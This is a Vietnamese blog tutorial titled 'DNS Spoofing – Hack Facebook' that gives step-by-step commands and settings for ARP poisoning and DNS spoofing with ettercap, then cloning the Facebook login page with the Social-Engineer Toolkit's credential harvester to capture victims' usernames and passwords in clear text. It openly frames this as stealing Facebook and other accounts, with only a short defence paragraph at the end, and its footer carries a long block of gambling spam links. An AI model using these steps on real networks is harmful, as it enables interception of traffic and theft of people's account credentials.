• Network
  • Security
  • Software
  • Thủ thuật
  • Tin tức
  • Video hướng dẫn
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

DNS Spoofing – Hack Facebook

AnonyViet by AnonyViet
in Facebook, Kali Linux / Parrot
Reading Time: 6 mins read
A A
0

Mình xin nói sơ qua về DNS – Domain Name System – Hệ thống phân giải tên miền.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Khi bạn vào web browser gõ facebook.com thì hệ thống DNS sẽ phân giải cho bạn sang địa chỉ IP để bạn có thể giao tiếp, truyền tải dữ liệu trên mạng.

Các bài viết liên quan

Cách tạo tài khoản Facebook phụ không cần Email, SĐT 41

Cách tạo tài khoản Facebook phụ không cần Email, SĐT

17/09/2023
Cách xóa tất cả nội dung đã đăng trên Facebook, Discord, Twitter.... 42

Cách xóa tất cả nội dung đã đăng trên Facebook, Discord, Twitter….

01/08/2023
Cách chỉnh thanh điều hướng Facebook để có những tính năng mới 43

Cách chỉnh thanh điều hướng Facebook để có những tính năng mới

22/07/2023
Cách tải và đăng ký ứng dụng Threads - MXH cạnh tranh trực tiếp với Twitter 44

Cách tải và đăng ký ứng dụng Threads – MXH cạnh tranh trực tiếp với Twitter

06/07/2023

Bài này mình sẽ chia làm 2 phần:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Phần 2: Sử dụng Setoolkit và Ettercap để thực hiện đánh cắp tài khoản facebook.

Thực hiện:

Phần 1: Sử dụng ettercap để thực hiện DNS Spoofing

Trước tiên, mình sẽ ping facebook.com xem thử địa chỉ IP tương ứng với tên miền facebook.com là gì

 photo facebook_zpsf1b7f07c.jpg

Tiếp đến, vào Kali Linux thực hiện Enable IP Forwarding.

#echo 1 > /proc/sys/net/ipv4/ip_forward

 photo ipforwarding_zps9e90c910.jpg

Tiếp theo sửa file etter.dns.

Sử dụng câu lệnh locate etter.dns xem hiện tại nó đang ở đâu. Xong thì tiến hành vào thêm các record sau:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

Với địa chỉ 192.168.0.109 là IP máy Attacker.

 photo etterdns_zps6db36b10.jpg

Note: Có thể nằm ở địa chỉ /usr/local/share/ettercap/etter.dns với các phiên bản Backtrack 5

Xong thì lưu lại và thoát :wq

 photo facebook2_zpscdfe6288.jpg

Thực hiện dns spoofing bằng câu lệnh

#ettercap -T -q -M arp:remote -P dns_spoof //

 photo ettercap_zpsac23a3f7.jpg

Sau đó vào máy client, cấp lại địa chỉ bằng câu lệnh >ipconfig /renew

 photo ettercap3_zps6c7aa75f.jpg

Bây giờ lên PC client truy cập vào facebook.com bạn sẽ thấy nó vẫn truy cập bình thường. Nhưng khi tiến hành ping đến facebook.com thì IP trả lời lại là 192.168.0.109 – IP máy Attacker.

 photo pingfacebook2_zps52486770.jpg

OK. Vậy là bạn đã thành công trong việc lái dữ liệu qua máy bạn, giờ chúng ta sẽ tiến hành đánh cắp tài khoản Facebook.

Phần 2: Sử dụng setoolkit và ettercap để thực hiện đánh cắp tài khoản facebook.

Công cụ sử dụng:

setoolkit: clone website, capture username/password

ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (nghe lén).

Video demo: Youtube

Hướng dẫn bằng hình ảnh

Bật setoolkit

#/usr/share/set/setoolkit

DNS Spoofing - Hack Facebook 23

Đồng ý điều khoản sử dụng Bấm y -> Enter

 photo setoolkit2_zps3d0fa4a2.jpg

Chọn 1) Social-Engineering Attacks

 photo setoolkit3_zps2970c553.jpg

Chọn 2) Website Attack Ventors

DNS Spoofing - Hack Facebook 24

Chọn 3) Credential Harvester Attack Method

DNS Spoofing - Hack Facebook 25

Chọn 2) Site Cloner

DNS Spoofing - Hack Facebook 26

Đánh địa chỉ IP của Attacker: 192.168.0.109

DNS Spoofing - Hack Facebook 27

Đánh đường dẫn muốn clone website: https://www.facebook.com

DNS Spoofing - Hack Facebook 28

Xong thì bật Terminal khác, đánh ettercap -G để bật cấu hình ettercap bằng giao diện

Chọn Sniff-> Unified sniffing

DNS Spoofing - Hack Facebook 29

Chọn cổng để nghe lén: eth0

DNS Spoofing - Hack Facebook 30

Chọn Hosts-> Scan for hosts

Host-> Hosts List

DNS Spoofing - Hack Facebook 31

Chọn 2 địa chỉ để tiến hành nghe lén

DNS Spoofing - Hack Facebook 32

Thực hiện ARP possoning (ARP spoofing)

DNS Spoofing - Hack Facebook 33

Click chọn Sniff remote connections.

DNS Spoofing - Hack Facebook 34

Vào /etc/ettercap/etter.dns thêm vào 2 dòng:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

DNS Spoofing - Hack Facebook 35

Vào Plugins-> Manage the plugins

DNS Spoofing - Hack Facebook 36

Click vào dns_spoof để bật tính năng này

DNS Spoofing - Hack Facebook 37

Start sniffing

DNS Spoofing - Hack Facebook 38

Tại máy client mở web browser vào facebook.com, điền username/password

DNS Spoofing - Hack Facebook 39

setoolkit sẽ bắt được username/password này

DNS Spoofing - Hack Facebook 40

Thông tin username/password hiện dưới dạng clear-text như trên, vậy là bạn đã có tài khoản facebook của client.

Cập nhật ngày 15/9/2015:

Ở phiên bản mới Kali 2.0, khi clone site về sẽ được lưu trong đường dẫn /var/www/ bạn tiến hành copy những file này vào đường dẫn /var/www/html sau đó tiến hành bình thường:

Note: nhớ change quyền để đọc và viết cho các file này:

#cd /var/www/html
#chmod 777 ./*

gồm 3 file là:
– index.html : giao diện của facebook.com
– post.php: hàm để lấy username/password khi bạn nhập vào và lưu ở file haverster_*.txt
– harvester_ngày_giờ.txt : lưu thông tin thu được.

 photo clone1.png

Bằng cách tương tự các bạn có thể đánh cắp nhiều tài khoản khác.

Cách phòng chống DNS Spoofing:

Ngoài 2 cách ở bài ARP spoofing là triển khai port-security và DAI các bạn nên triển khai thêm DHCP snooping để ngăn chặn cấp DHCP giả mạo.

P/s: Như các bạn đã thấy, nếu attacker đã vào được trong mạng nội bộ của chúng ta mà có ý đồ đen tối thì có nhiều công cụ để khai khác thông tin của công ty mình. Như vậy, nếu nhân viên nào có ý đồ phá hoại công ty thì cũng khá vất vả để điều tra.

Nhân tiện đây, bạn nào có sử dụng công cụ hay chương trình giám sát nào bổ ích thì chia sẻ cho anh em biết với nhé.

Thân,

Bài viết đạt: 5/5 - (100 bình chọn)
Tags: dnsFacebookhackkali linux
AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

Cách tạo tài khoản Facebook phụ không cần Email, SĐT 45
Facebook

Cách tạo tài khoản Facebook phụ không cần Email, SĐT

17/09/2023
Cách chỉnh thanh điều hướng Facebook để có những tính năng mới 46
Facebook

Cách chỉnh thanh điều hướng Facebook để có những tính năng mới

22/07/2023
Sự nguy hiểm của thư mục .git 47
Basic Hacking

Sự nguy hiểm của thư mục .git

26/05/2023
Truy cập internet ẩn danh 100% bằng Kasm Workspaces 48
Kali Linux / Parrot

Truy cập internet ẩn danh 100% bằng Kasm Workspaces

12/05/2023
Code tạo Page tự động trên Facebook 49
Facebook

Code tạo Page tự động trên Facebook

30/04/2023
Hướng dẫn cách xóa lịch sử tìm kiếm trên Facebook 50
Facebook

Hướng dẫn cách xóa lịch sử tìm kiếm trên Facebook

14/04/2023
Next Post
[Facebook] TUT Rip mới nhất

[Facebook] TUT Rip mới nhất

Liên hệ Quảng Cáo

Lien he AnonyViet

Các bài mới

Cách chèn logo hàng loạt vào từng slide Powerpoint 51

Cách chèn logo hàng loạt vào từng slide Powerpoint

30/09/2023
Cách xem TikTok không cần Internet 52

Cách xem TikTok không cần Internet

30/09/2023
3 cách khôi phục menu chuột phải cũ trong Windows 11 53

3 cách khôi phục menu chuột phải cũ trong Windows 11

29/09/2023
macOS Sonoma ra mắt với nhiều cải tiến mới 54

macOS Sonoma ra mắt với nhiều cải tiến mới

29/09/2023
Prodima - Trung tâm đào tạo seo tại TPHCM uy tín, chất lượng nhất hiện nay 55

Prodima – Trung tâm đào tạo seo tại TPHCM uy tín, chất lượng nhất hiện nay

28/09/2023

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • fre fir trong Cách vượt Xác thực 2 yếu tố cho Facebook mới nhất
  • khanh trong Full hướng dẫn học Hack trên Kali Linux
  • Thuong trong Hướng dẫn cài Qv2Ray để Hack 4G trên Windows
  • AnonyViet trong Download Panel TMV: Panel chỉnh sửa ảnh miễn phí cho Photoshop
  • T MV trong Download Panel TMV: Panel chỉnh sửa ảnh miễn phí cho Photoshop

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ ku11net.link F8BET W88 ST666 https://jun886.net Trực tiếp bóng đá xoilac tv ae888 New 88 new88 Nhà cái New88 uy tín https://vn88.news/ suncity https://hi88g.com/ Dewabet Fun88 SODO CASINO vn88 vc ae3888 sodo casino 79king.cam ee88788.com go88 nhà cái Jun88 uy tín https://jun88.land/ Twin xem bong da truc tiep ku11 https://st6667.com/ Nhà Cái PTWIN i9betcom.net NHÀ CÁI UY TÍN 789WIN xem keo nha cai Xoilac tv Vnloto Lucky88 cwin 12BET MNCX Five88 dự đoán xổ số nhacai banca Lode88 6686vni.com Game mobile lodeonline awin681.com 8us Lucky88 Xoso66 onbet 789win 333666.casino 123b com new88 hi88 VN138 nhận định kèo nhà cái sv388bet.cam hitclub.bz 7ball sunwin Kubet1 nohu52.fun https://tdtcblog.club/ http://win79bet.club/ https://sunwin1.in/ QH88 https://kubet77.to https://bongdanet.win/ Jun88 new88788.com tdtc.guru KUBET77 Nhà Cái Uy Tín Onl SM66 bossnhacai.com https://kubet88.gg/ Cubet nhà cái j88 Net88 game bài đổi thưởng socolive https://kubet.icu socolive tv

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ ku11net.link F8BET W88 ST666 https://jun886.net Trực tiếp bóng đá xoilac tv ae888 New 88 new88 Nhà cái New88 uy tín https://vn88.news/ suncity https://hi88g.com/ Dewabet Fun88 SODO CASINO vn88 vc ae3888 sodo casino 79king.cam ee88788.com go88 nhà cái Jun88 uy tín https://jun88.land/ Twin xem bong da truc tiep ku11 https://st6667.com/ Nhà Cái PTWIN i9betcom.net NHÀ CÁI UY TÍN 789WIN xem keo nha cai Xoilac tv Vnloto Lucky88 cwin 12BET MNCX Five88 dự đoán xổ số nhacai banca Lode88 6686vni.com Game mobile lodeonline awin681.com 8us Lucky88 Xoso66 onbet 789win 333666.casino 123b com new88 hi88 VN138 nhận định kèo nhà cái sv388bet.cam hitclub.bz 7ball sunwin Kubet1 nohu52.fun https://tdtcblog.club/ http://win79bet.club/ https://sunwin1.in/ QH88 https://kubet77.to https://bongdanet.win/ Jun88 new88788.com tdtc.guru KUBET77 Nhà Cái Uy Tín Onl SM66 bossnhacai.com https://kubet88.gg/ Cubet nhà cái j88 Net88 game bài đổi thưởng socolive https://kubet.icu socolive tv